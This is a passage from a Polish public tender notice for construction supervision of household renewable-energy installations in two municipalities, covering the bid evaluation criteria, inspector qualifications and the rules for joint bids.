płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 2 szt.<br/>Zestaw 20: 3 kolektory słoneczne płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej – 11 szt.<br/>Zestaw 21: 4 kolektory słoneczne płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej – 2 szt.<br/><br/>Wszystkie stawiane wymagania zawarte w SWZ są jednakowe dla każdej z czterech części zamówienia; należy je traktować oddzielnie w stosunku do poszczególnych zadań <br/>z wyjątkami opisanymi bezpośrednio w SWZ.<br/><br/><br/>Zadanie dofinansowane ze środków Instrumentu REACT-EU w ramach działania 11.2 Rozwój OZE – REACT-EU, Osi priorytetowej nr III Czysta Energia, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, umowa o dofinansowanie Projektu nr RPPK.11.02.00-18-0004/21-00.	<br/>Zgodnie z art. 310 ustawy Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostały mu przyznane.<br/><br/>Wykonawca(y) zobowiązany będzie zawrzeć odrębne umowy dla Gminy Jarosław i dla Gminy Roźwienica na świadczenie usług nadzoru oddzielnie dla każdego z zadań częściowych.<br/><br/>12.2. Pozostałe warunki dotyczące realizacji zamówienia określone zostały w projektowanych postanowieniach umowy - załącznik nr 7 do SWZ <br/><br/>12.3. Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1.	CENA	80 %<br/>2.	ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA	20 %<br/>	Razem	100 %<br/><br/>24.2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej. <br/><br/>KRYTERIUM CENA - 80 % (C).<br/>Maksymalną ilość punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Ilość punktów <br/>przyznana ofercie w kryterium „Cena” zostanie określona zgodnie ze wzorem: <br/> <br/> Cena oferty najtańszej <br/>C = ------------------------------------------- × Kp × Wc <br/> Cena oferty badanej <br/><br/>gdzie: <br/>C – liczba punktów przyznana ocenianej ofercie w kryterium cena, <br/>Kp – współczynnik proporcjonalności = 100, <br/>Wc – waga procentowa dla kryterium „Cena” = 80 %.<br/><br/>KRYTERIUM ILOŚĆ POBYTÓW INSPEKTORA NADZORU NA TERENIE WYKONYWANIA ZAMÓWIENIA - 20 % (I).<br/>Ocena ofert w kryterium „ilość wizyt inspektora nadzoru na budowie” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad.<br/>Zamawiający zgodnie z pkt 12.3.2. ppkt 1 lit. b SWZ wymaga pobytu inspektora nadzoru lub inspektorów nadzoru (w przypadku, gdy zadanie częściowe w ramach niniejszego postępowania stawia warunek udziału obydwu inspektorów nadzoru) na terenie wykonywania zamówienia minimum 1 raz na 5 dni roboczych, licząc od dnia następnego po rozpoczęciu montażu przez Wykonawców zamówień, każdy potwierdzony wpisem do dziennika prowadzonego przez przedstawicieli zamawiającego. <br/>Zgodnie z deklaracją Wykonawcy zawartą w Formularzu ofertowym, Zamawiający przyzna ofercie poniżej przedstawioną ilość punktów: <br/>1)	2 pobyty w ciągu 5 dni roboczych – 5 pkt,<br/>2)	3 pobyty w ciągu 5 dni roboczych – 10 pkt,<br/>3)	4 pobyty w ciągu 5 dni roboczych – 15 pkt,<br/>4)	codzienny pobyt - 20 pkt.<br/><br/>W przypadku braku informacji w ofercie Wykonawcy, w zakresie oznaczenia ilości wizyt inspektora nadzoru na budowie, Zamawiający przyjmie, iż Wykonawca spełnia warunek minimalny (1 pobyt na tydzień). <br/><br/>24.4.1. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: <br/><br/>C + I = S <br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>C - ilość punktów przyznanych ofercie w kryterium cena,<br/>I – ilość punktów przyznanych ofercie w kryterium ilość wizyt inspektora nadzoru na budowie.<br/><br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”<br/>Nadzór pełniony będzie nad robotami budowlanymi pełnego zakresu robót zgodnie <br/>z dokumentacją, która określa zakres i sposób wykonania robót, dostępna na stronie internetowej Zamawiającego pod linkami: <br/>https://platformazakupowa.pl/transakcja/635469.<br/>Część 3: Dostawa i montaż instalacji powietrznych pomp ciepła dla prywatnych budynków mieszkalnych: na potrzeby przygotowania ciepłej wody użytkowej (c.w.u.) oraz na potrzeby centralnego ogrzewania (c.o.) i przygotowania ciepłej wody użytkowej (c.w.u.) – łącznie 53 kpl instalacji, w tym: 35 kpl instalacji dla Gminy Jarosław oraz 18 kpl instalacji dla Gminy Roźwienica.<br/>Następujące zestawy instalacji, w ilościach:<br/>Instalacje powietrznych pomp ciepła c.w.u. zlokalizowane w budynku mieszkalnym <br/>o powierzchni użytkowej do 300 m2:<br/>Zestaw 22: powietrzna pompa ciepła c.w.u. o mocy min. 1,70 kW z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 13 szt.<br/>Instalacje powietrznych pomp ciepła c.o. + c.w.u. zlokalizowane w budynku mieszkalnym <br/>o powierzchni użytkowej do 300 m2:<br/>Zestaw 23: powietrzna pompa ciepła c.o. + c.w.u. o mocy min. 10,00 kW z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 4 szt.<br/>Zestaw 24: powietrzna pompa ciepła c.o. + c.w.u. o mocy min. 13,00 kW z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 20 szt.<br/>Zestaw 25: powietrzna pompa ciepła c.o. + c.w.u. o mocy min. 15,00 kW z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 16 szt.<br/>Wszystkie stawiane wymagania zawarte w SWZ są jednakowe dla każdej z czterech części zamówienia; należy je traktować oddzielnie w stosunku do poszczególnych zadań <br/>z wyjątkami opisanymi bezpośrednio w SWZ.<br/><br/><br/>Zadanie dofinansowane ze środków Instrumentu REACT-EU w ramach działania 11.2 Rozwój OZE – REACT-EU, Osi priorytetowej nr III Czysta Energia, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, umowa o dofinansowanie Projektu nr RPPK.11.02.00-18-0004/21-00.	<br/>Zgodnie z art. 310 ustawy Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostały mu przyznane.<br/><br/>Wykonawca(y) zobowiązany będzie zawrzeć odrębne umowy dla Gminy Jarosław i dla Gminy Roźwienica na świadczenie usług nadzoru oddzielnie dla każdego z zadań częściowych.<br/><br/>12.2. Pozostałe warunki dotyczące realizacji zamówienia określone zostały w projektowanych postanowieniach umowy - załącznik nr 7 do SWZ <br/><br/>12.3. Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1.	CENA	80 %<br/>2.	ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA	20 %<br/>	Razem	100 %<br/><br/>24.2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej. <br/><br/>KRYTERIUM CENA - 80 % (C).<br/>Maksymalną ilość punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Ilość punktów <br/>przyznana ofercie w kryterium „Cena” zostanie określona zgodnie ze wzorem: <br/> <br/> Cena oferty najtańszej <br/>C = ------------------------------------------- × Kp × Wc <br/> Cena oferty badanej <br/><br/>gdzie: <br/>C – liczba punktów przyznana ocenianej ofercie w kryterium cena, <br/>Kp – współczynnik proporcjonalności = 100, <br/>Wc – waga procentowa dla kryterium „Cena” = 80 %.<br/><br/>KRYTERIUM ILOŚĆ POBYTÓW INSPEKTORA NADZORU NA TERENIE WYKONYWANIA ZAMÓWIENIA - 20 % (I).<br/>Ocena ofert w kryterium „ilość wizyt inspektora nadzoru na budowie” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad.<br/>Zamawiający zgodnie z pkt 12.3.2. ppkt 1 lit. b SWZ wymaga pobytu inspektora nadzoru lub inspektorów nadzoru (w przypadku, gdy zadanie częściowe w ramach niniejszego postępowania stawia warunek udziału obydwu inspektorów nadzoru) na terenie wykonywania zamówienia minimum 1 raz na 5 dni roboczych, licząc od dnia następnego po rozpoczęciu montażu przez Wykonawców zamówień, każdy potwierdzony wpisem do dziennika prowadzonego przez przedstawicieli zamawiającego. <br/>Zgodnie z deklaracją Wykonawcy zawartą w Formularzu ofertowym, Zamawiający przyzna ofercie poniżej przedstawioną ilość punktów: <br/>1)	2 pobyty w ciągu 5 dni roboczych – 5 pkt,<br/>2)	3 pobyty w ciągu 5 dni roboczych – 10 pkt,<br/>3)	4 pobyty w ciągu 5 dni roboczych – 15 pkt,<br/>4)	codzienny pobyt - 20 pkt.<br/><br/>W przypadku braku informacji w ofercie Wykonawcy, w zakresie oznaczenia ilości wizyt inspektora nadzoru na budowie, Zamawiający przyjmie, iż Wykonawca spełnia warunek minimalny (1 pobyt na tydzień). <br/><br/>24.4.1. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: <br/><br/>C + I = S <br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>C - ilość punktów przyznanych ofercie w kryterium cena,<br/>I – ilość punktów przyznanych ofercie w kryterium ilość wizyt inspektora nadzoru na budowie.<br/><br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 12.1. Główny przedmiot:<br/>Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”<br/>Nadzór pełniony będzie nad robotami budowlanymi pełnego zakresu robót zgodnie <br/>z dokumentacją, która określa zakres i sposób wykonania robót, dostępna na stronie internetowej Zamawiającego pod linkami: <br/>https://platformazakupowa.pl/transakcja/635469<br/>Część 4: Dostawa i montaż kotłów na biomasę dla prywatnych budynków mieszkalnych – łącznie 30 kpl instalacji, w tym: 16 kpl instalacji dla Gminy Jarosław oraz 14 kpl instalacji dla Gminy Roźwienica.<br/>Następujące zestawy instalacji, w ilościach:<br/>Kotły na pellet zlokalizowane w budynku mieszkalnym o powierzchni użytkowej do 300 m2:<br/>Zestaw 26: kocioł na pellet o mocy min. 10,00 kW – 6 szt.<br/>Zestaw 27: kocioł na pellet o mocy min. 15,00 kW – 15 szt.<br/>Zestaw 28: kocioł na pellet o mocy min. 20,00 kW – 7 szt.<br/>Zestaw 29: kocioł na pellet o mocy min. 24,00 kW – 2 szt.<br/>Wszystkie stawiane wymagania zawarte w SWZ są jednakowe dla każdej z czterech części zamówienia; należy je traktować oddzielnie w stosunku do poszczególnych zadań <br/>z wyjątkami opisanymi bezpośrednio w SWZ.<br/><br/>Zadanie dofinansowane ze środków Instrumentu REACT-EU w ramach działania 11.2 Rozwój OZE – REACT-EU, Osi priorytetowej nr III Czysta Energia, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, umowa o dofinansowanie Projektu nr RPPK.11.02.00-18-0004/21-00.	<br/>Zgodnie z art. 310 ustawy Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostały mu przyznane.<br/><br/>Wykonawca(y) zobowiązany będzie zawrzeć odrębne umowy dla Gminy Jarosław i dla Gminy Roźwienica na świadczenie usług nadzoru oddzielnie dla każdego z zadań częściowych.<br/><br/>12.2. Pozostałe warunki dotyczące realizacji zamówienia określone zostały w projektowanych postanowieniach umowy - załącznik nr 7 do SWZ <br/><br/>12.3. Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1.	CENA	80 %<br/>2.	ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA	20 %<br/>	Razem	100 %<br/><br/>24.2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej. <br/><br/>KRYTERIUM CENA - 80 % (C).<br/>Maksymalną ilość punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Ilość punktów <br/>przyznana ofercie w kryterium „Cena” zostanie określona zgodnie ze wzorem: <br/> <br/> Cena oferty najtańszej <br/>C = ------------------------------------------- × Kp × Wc <br/> Cena oferty badanej <br/><br/>gdzie: <br/>C – liczba punktów przyznana ocenianej ofercie w kryterium cena, <br/>Kp – współczynnik proporcjonalności = 100, <br/>Wc – waga procentowa dla kryterium „Cena” = 80 %.<br/><br/>KRYTERIUM ILOŚĆ POBYTÓW INSPEKTORA NADZORU NA TERENIE WYKONYWANIA ZAMÓWIENIA - 20 % (I).<br/>Ocena ofert w kryterium „ilość wizyt inspektora nadzoru na budowie” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad.<br/>Zamawiający zgodnie z pkt 12.3.2. ppkt 1 lit. b SWZ wymaga pobytu inspektora nadzoru lub inspektorów nadzoru (w przypadku, gdy zadanie częściowe w ramach niniejszego postępowania stawia warunek udziału obydwu inspektorów nadzoru) na terenie wykonywania zamówienia minimum 1 raz na 5 dni roboczych, licząc od dnia następnego po rozpoczęciu montażu przez Wykonawców zamówień, każdy potwierdzony wpisem do dziennika prowadzonego przez przedstawicieli zamawiającego. <br/>Zgodnie z deklaracją Wykonawcy zawartą w Formularzu ofertowym, Zamawiający przyzna ofercie poniżej przedstawioną ilość punktów: <br/>1)	2 pobyty w ciągu 5 dni roboczych – 5 pkt,<br/>2)	3 pobyty w ciągu 5 dni roboczych – 10 pkt,<br/>3)	4 pobyty w ciągu 5 dni roboczych – 15 pkt,<br/>4)	codzienny pobyt - 20 pkt.<br/><br/>W przypadku braku informacji w ofercie Wykonawcy, w zakresie oznaczenia ilości wizyt inspektora nadzoru na budowie, Zamawiający przyjmie, iż Wykonawca spełnia warunek minimalny (1 pobyt na tydzień). <br/><br/>24.4.1. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: <br/><br/>C + I = S <br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>C - ilość punktów przyznanych ofercie w kryterium cena,<br/>I – ilość punktów przyznanych ofercie w kryterium ilość wizyt inspektora nadzoru na budowie.<br/><br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 15. Warunki udziału w postępowaniu o udzielenie zamówienia. <br/>15.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/><br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli:<br/>a)	Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą (słownie: jedną) pełniącą funkcje Inspektora nadzoru w zakresie branży instalacyjnej <br/>w zakresie sieci, instalacji i urządzeń, która posiada stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej do kierowania robotami <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego <br/>do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <br/>– dotyczy zadania częściowego nr 2, 3 i 4;<br/>b)	Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą (słownie: jedną) pełniącą funkcje Inspektora nadzoru w zakresie branży sieci i instalacji elektrycznych, która posiada stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej do kierowania robotami w zakresie sieci, instalacji <br/>i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami zgodnie <br/>z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>– dotyczy zadania częściowego nr 1 i 3. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">18.2.1	w celu wykazania spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dot. zdolności technicznej lub zawodowej należy przedłożyć:<br/>	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 4 do SWZ);<br/>18.2.2 w celu wykazania spełnienia braku podstaw wykluczenia wykonawca składa <br/>na wezwanie zamawiającego następujących podmiotowych środków dowodowych: <br/>	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 1 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 2 ustawy Pzp.<br/>c)	art. 108 ust. 1 pkt ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>d)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>	zgodnie z załącznikiem nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 19.5.	Kompletna oferta zawiera:<br/>19.5.1.	formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do SWZ,<br/>19.5.2.	oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków w postępowaniu w zakresie wskazanym w pkt 19.2 SWZ - wg wzoru stanowiącego załącznik nr 2 <br/>do SWZ,<br/>19.5.3.	oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SWZ (jeżeli dotyczy),<br/>19.5.4.	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>z którego wynika, które roboty dostawy lub usługi wykonają poszczególni wykonawcy; wg wzoru stanowiącego załącznik nr 6 do SWZ (jeżeli dotyczy),<br/>19.5.5.	zobowiązanie podmiotu udostępniającego zasoby wg wzoru stanowiącego załącznik nr 5 do SWZ (jeżeli dotyczy),<br/>19.5.6.	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt 19.7.2 Warunek ten dotyczy również odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie <br/>do podpisania oferty,<br/>19.5.7.	zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy), <br/>19.6.	Podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w niniejszym pkt 19.5.4 oraz zobowiązanie podmiotu udostępniającego zasoby, oraz pełnomocnictwo przekazuje się w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (spółki cywilne/ konsorcja).<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców (współpartnerów) wchodzących <br/>w skład konsorcjum lub spółki cywilnej musi być przedstawiona, jako jedna oferta, <br/>od jednego podmiotu i spełniać następujące wymagania:<br/>1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika (lidera) do reprezentowania ich w postępowaniu albo do reprezentowania ich <br/>w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres umocowania,<br/>2)	wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie <br/>z pełnomocnikiem 